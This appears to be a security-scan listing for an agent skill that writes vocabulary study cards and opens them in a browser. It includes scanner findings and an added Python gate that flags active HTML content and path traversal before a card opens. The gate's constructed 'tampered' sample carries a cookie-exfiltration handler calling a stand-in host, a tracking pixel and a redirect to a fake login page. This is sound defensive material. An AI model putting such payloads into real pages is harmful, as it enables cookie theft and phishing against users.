english-vocabulary-helper

Security checks across malware telemetry and agentic risk

Overview

This vocabulary-helper skill is instruction-only (it consists of agent instructions, not executable code) and consistently saves local study files as described; users should know that it also auto-opens the generated HTML cards in the browser.

Install this if you are comfortable with the agent creating Markdown and HTML vocabulary cards under ~/.qclaw/workspace/vocabulary/words/ and opening the generated HTML in your browser. If untrusted or unusual content reaches the prompt (for example a word list pasted from elsewhere), review the generated HTML before it is opened, because that content ends up in a file the browser renders.

SkillSpector

By NVIDIA
Vulnerability Patterns
  • Excessive Agency: Unrestricted Tool Access, Autonomous Decision Making, Scope Creep
  • MCP Tool Poisoning: Hidden Instructions, Unicode Deception, Parameter Description Injection
  • Prompt Injection: Instruction Override, Hidden Instructions, Exfiltration Commands
  • Data Exfiltration: External Transmission, Env Variable Harvesting, File System Enumeration
  • Privilege Escalation: Excessive Permissions, Sudo/Root Execution, Credential Access
Findings (3)

Description-Behavior Mismatch

Medium severity (94% confidence)

The skill claims to be a vocabulary-learning helper, but it requires persistent file creation and automatic opening of generated HTML files on every use. That behavior exceeds what simple tutoring needs and creates avoidable system-side effects (disk writes and launching local content) that could be abused if the content the agent generates is ever manipulated, for instance through prompt injection.

Context-Inappropriate Capability

Medium severity (96% confidence)

Mandating that the agent automatically open generated HTML files introduces a local launch action unrelated to the core educational purpose. Even though the HTML is generated locally, auto-launching browser-rendered content exposes the user to active scripts, deceptive UI, or unsafe future modifications without a user-approval step.

Missing User Warnings

Medium severity (93% confidence)

The skill directs the agent to create files and open HTML automatically without a clear consent step, even though these are system-impacting actions beyond ordinary tutoring. This violates the principle of least astonishment and can lead to unwanted writes or file launches carried out on the user's behalf.
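A pre-open gate that covers the Overview's advice to review generated HTML and the two findings above (auto-launch of browser content, writes outside the expected folder). This is an added example, not code from the english-vocabulary-helper skill, SkillSpector or NVIDIA. It assumes the directory layout the listing describes (~/.qclaw/workspace/vocabulary/words/); the function names, the DEMO_ROOT path and the two sample cards are constructed for the example. A locally generated study card has no legitimate need for scripts, event handlers, remote resource loads, redirects or forms, so any of those is treated as a reason to stop and show the user the file instead of launching it.

```python
"""Gate an agent-generated vocabulary card before it is opened in a browser.

Added example; not part of the english-vocabulary-helper skill, SkillSpector
or NVIDIA. Assumes HTML cards live under ~/.qclaw/workspace/vocabulary/words/
(from the listing). Requires Python 3.9+ for Path.is_relative_to.
"""
from html.parser import HTMLParser
from pathlib import Path

DEFAULT_ROOT = "~/.qclaw/workspace/vocabulary/words"          # path from the listing
DEMO_ROOT = "/tmp/qclaw-demo/workspace/vocabulary/words"     # constructed root for the demo

# Elements that execute code, embed other documents, submit data or rebase URLs.
ACTIVE_TAGS = {"script", "iframe", "frame", "object", "embed", "form", "base"}
# Attributes that carry URLs; a remote URL here means the card phones home when opened.
URL_ATTRS = {"src", "href", "action", "data", "poster", "formaction"}


class ActiveContentScanner(HTMLParser):
    """Collects human-readable reasons a card should not be auto-opened."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            value = value or ""                        # valueless attributes parse as None
            compact = "".join(value.lower().split())   # defeat "java script:" style spacing
            if name.startswith("on"):                  # onload=, onerror=, onmouseover= ...
                self.findings.append(f"inline event handler {name}= on <{tag}>")
            elif name in URL_ATTRS and compact.startswith(("javascript:", "vbscript:", "data:text/html")):
                self.findings.append(f"{name} on <{tag}> uses a scriptable URL scheme")
            elif name in URL_ATTRS and compact.startswith(("http:", "https:", "//")):
                self.findings.append(f"{name} on <{tag}> loads a remote resource: {value}")
            elif tag == "meta" and name == "http-equiv" and compact == "refresh":
                self.findings.append("<meta http-equiv=refresh> redirect")


def active_content_findings(html: str) -> list:
    """Return the active-content findings for an HTML document (empty list = inert card)."""
    scanner = ActiveContentScanner()
    scanner.feed(html)
    scanner.close()
    return scanner.findings


def inside_workspace(card_path: str, root: str = DEFAULT_ROOT) -> bool:
    """True only if card_path resolves (after .. and symlinks) to somewhere under root."""
    root_resolved = Path(root).expanduser().resolve()
    return Path(card_path).expanduser().resolve().is_relative_to(root_resolved)


def blocking_reasons(card_path: str, html: str, root: str = DEFAULT_ROOT) -> list:
    """Everything that should stop an automatic open; an empty list means it is safe to launch."""
    reasons = []
    if not inside_workspace(card_path, root):
        reasons.append(f"{card_path} is outside {root}")
    reasons.extend(active_content_findings(html))
    return reasons


# Constructed sample cards: one as the skill intends, one with injected content.
CLEAN_CARD = """<!doctype html><html><head><meta charset="utf-8"><title>ephemeral</title>
<style>body{font-family:sans-serif}</style></head>
<body><h1>ephemeral</h1><p>Lasting for a very short time.</p>
<p><em>Cherry blossoms are an ephemeral pleasure.</em></p></body></html>"""

TAMPERED_CARD = """<!doctype html><html><body><h1>ephemeral</h1>
<img src="https://example.invalid/t.gif?w=ephemeral">
<p onmouseover="fetch('https://example.invalid/c?d='+document.cookie)">Lasting for a very short time.</p>
<script>location='https://example.invalid/login'</script></body></html>"""

if __name__ == "__main__":
    for label, card in (("clean", CLEAN_CARD), ("tampered", TAMPERED_CARD)):
        reasons = blocking_reasons(f"{DEMO_ROOT}/ephemeral.html", card, DEMO_ROOT)
        print(label, "-> open" if not reasons else "-> HOLD: " + "; ".join(reasons))
    # A traversal in the card path is caught before any open is attempted.
    print(blocking_reasons(f"{DEMO_ROOT}/../../../../.bashrc", CLEAN_CARD, DEMO_ROOT))
```

The gate is deliberately a denylist of things a static study card never needs rather than an attempt to sanitize the HTML: if anything is flagged, the right response is to show the user the file path and the reasons and ask before launching, which is exactly the consent step the third finding says the skill lacks.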

VirusTotal

0/65 vendors flagged this skill; all 65 engines reported it clean. Note that antivirus engines look for known-malicious code in the files they are given, not for what an agent will do when it follows the skill's instructions, so a clean VirusTotal result does not speak to the SkillSpector findings above.
